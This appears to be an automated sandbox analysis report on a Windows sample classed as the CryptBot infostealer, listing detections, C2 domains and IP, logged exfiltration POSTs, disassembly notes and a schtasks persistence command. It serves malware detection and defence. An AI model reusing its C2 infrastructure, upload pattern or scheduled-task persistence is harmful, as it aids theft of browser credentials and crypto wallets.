Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532996
MD5: 7105a2ba8c897b6c2072a6ab0bdecdf1
SHA1: d3659027483c2825c8430a41a0c3e439aac78e2f
SHA256: abc53ac9f7564ceba0a7548b880b1e92c8e0329ff9680e3c5f06abcbd4e869b9
Tags: exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Found malware configuration
Source: file.exe.7432.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["analforeverlovyu.top", "pn.top", "n.top", "0asevtbv17pn.top", "+sevtbv17pn.top", "@sevtbv17pn.top", "sevtbv17pn.top"]}
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 34%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_005315B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 4_2_005315B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 4_2_6C2F14B0
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 4_2_005381E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C36AC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C36AD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C36AD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C392EF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C30AF80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C3CF960h 4_2_6C30E8C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C31E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C31E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C3104F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 4_2_6C3904E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C310610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31A720
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C31A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C310010
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C3CD014h] 4_2_6C3C4110
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C314203
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 4_2_6C398250
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C31C2C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31A330
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C31A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C36BDF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C36BF50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 4_2_6C349F90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C3A9900
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C32B987
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C32B98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C36BAC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C367AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 4_2_6C31D424
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C3CDFF4h 4_2_6C363440
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 4_2_6C31D5A4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C3635F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 4_2_6C31D724
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C31D050
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 4_2_6C387100
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C31D2B4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C36B280
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 4_2_6C3693B0

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49730 -> 80.66.81.78:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49731 -> 80.66.81.78:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49734 -> 80.66.81.78:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: analforeverlovyu.top
Source: Malware configuration extractor URLs: pn.top
Source: Malware configuration extractor URLs: n.top
Source: Malware configuration extractor URLs: 0asevtbv17pn.top
Source: Malware configuration extractor URLs: +sevtbv17pn.top
Source: Malware configuration extractor URLs: @sevtbv17pn.top
Source: Malware configuration extractor URLs: sevtbv17pn.top
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TEAM-HOSTASRU TEAM-HOSTASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary70837388User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 411Host: sevtbv17pn.top
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary12658505User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 89281Host: sevtbv17pn.top
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary60576727User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 31924Host: sevtbv17pn.top
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: sevtbv17pn.top
Source: unknown HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary70837388User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 411Host: sevtbv17pn.top
Source: file.exe, 00000000.00000003.1859870408.00000000010FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sevtbv17pn.top/
Source: file.exe, 00000000.00000003.1859870408.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768676819.00000000010DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sevtbv17pn.top/v1/upload.php
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: TMdMlTZMAWbrEijBRYMr.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: file.exe String found in binary or memory: https://keruzam.com/update.php?compName
Source: file.exe, 00000000.00000003.2374347014.000000006A364000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: https://keruzam.com/update.php?compName=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C309B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber, 4_2_6C309B99
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C309B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber, 4_2_6C309B99

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_005351B0 4_2_005351B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_00533E20 4_2_00533E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2FCD00 4_2_6C2FCD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2FEE50 4_2_6C2FEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3B4E80 4_2_6C3B4E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C300FC0 4_2_6C300FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C340870 4_2_6C340870
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C332A7E 4_2_6C332A7E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C334490 4_2_6C334490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3044F0 4_2_6C3044F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C328570 4_2_6C328570
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C330580 4_2_6C330580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C322110 4_2_6C322110
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33FE10 4_2_6C33FE10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C331E40 4_2_6C331E40
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C305880 4_2_6C305880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33D99E 4_2_6C33D99E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C34DA20 4_2_6C34DA20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C31F510 4_2_6C31F510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3296A0 4_2_6C3296A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3377D0 4_2_6C3377D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F3000 4_2_6C2F3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3070C0 4_2_6C3070C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3311BE 4_2_6C3311BE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3412C0 4_2_6C3412C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33F3C0 4_2_6C33F3C0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3BAB60 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3C3490 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3C3310 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3C5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3C5A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3C38D0 appears 38 times
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AWxXIdIDvb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\uoijNYchjvFkhpkdArrg
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000003.1824507467.0000000001C34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: tmdmltzmawbreijbrymr.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: tmdmltzmawbreijbrymr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: tmdmltzmawbreijbrymr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe Static file information: File size 7457792 > 1048576
Source: file.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4c5600
Source: file.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1da600
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_00538230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 4_2_00538230
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name: .eh_fram
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: TMdMlTZMAWbrEijBRYMr.dll.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_0053A499 push es; iretd 4_2_0053A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C338C2A push edx; mov dword ptr [esp], ebx 4_2_6C338C3E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C364DB0 push eax; mov dword ptr [esp], ebx 4_2_6C365018
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C344DC1 push eax; mov dword ptr [esp], ebx 4_2_6C344DD5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C336E03 push edx; mov dword ptr [esp], ebx 4_2_6C336E17
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C344FA1 push eax; mov dword ptr [esp], ebx 4_2_6C344FB5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C36E860 push eax; mov dword ptr [esp], ebx 4_2_6C36E98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C358850 push eax; mov dword ptr [esp], ebx 4_2_6C358E4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C340852 push eax; mov dword ptr [esp], ebx 4_2_6C340866
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C34285C push edx; mov dword ptr [esp], ebx 4_2_6C342870
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3729A0 push eax; mov dword ptr [esp], ebx 4_2_6C372CD4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3729A0 push edx; mov dword ptr [esp], ebx 4_2_6C372CF3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3A09E0 push eax; mov dword ptr [esp], edi 4_2_6C3A0B5A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C36EAC0 push eax; mov dword ptr [esp], ebx 4_2_6C36EBE3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C344BE1 push eax; mov dword ptr [esp], ebx 4_2_6C344BF5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C380460 push eax; mov dword ptr [esp], ebx 4_2_6C3807FF
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C330452 push eax; mov dword ptr [esp], ebx 4_2_6C33048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C348451 push 890005EAh; ret 4_2_6C348459
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3304BE push eax; mov dword ptr [esp], ebx 4_2_6C33048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3364A3 push edx; mov dword ptr [esp], ebx 4_2_6C3364B7
